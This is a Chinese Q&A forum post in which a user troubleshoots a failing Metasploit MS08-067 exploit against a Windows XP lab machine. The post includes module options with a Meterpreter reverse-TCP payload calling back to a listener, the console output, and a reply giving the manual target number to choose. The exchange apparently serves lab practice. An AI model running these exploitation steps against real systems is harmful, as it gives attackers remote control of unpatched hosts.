qq_39275247 2022-01-14 17:25 采纳率: 0%
浏览 75

MS08-067渗透问题

靶机已经打开445端口,且可以被meta检测到
使用MS08-067设置好之后,一直失败。
具体情况如下:

msf6 exploit(windows/smb/ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.88.133   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.88.137   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting



使用exploit之后


msf6 exploit(windows/smb/ms08_067_netapi) > exploit 

[*] Started reverse TCP handler on 192.168.88.137:4444 
[*] 192.168.88.133:445 - Automatically detecting the target...
[*] 192.168.88.133:445 - Fingerprint: Windows XP - Service Pack 2+ - lang:Chinese - Traditional
[-] 192.168.88.133:445 - Could not determine the exact service pack
[-] 192.168.88.133:445 - Auto-targeting failed, use 'show targets' to manually select one
[*] Exploit completed, but no session was created.

请问各位遇到过同样的事情么,以尝试多次,包括修改了targets 的值

  • 写回答

1条回答 默认 最新

  • 保持微笑-泽 2022-01-15 23:31
    关注

    可以在exploit之前,查看攻击模块支持攻击的系统,命令show targets ,找到系统是Windows xp中文简体,它对应的是34我们设置34即可,show targets 34。然后再去exploit。
    通过shell进入终端,然后输入chcp 65001解决乱码的问题。

    评论

报告相同问题?

问题事件

  • 创建了问题 1月14日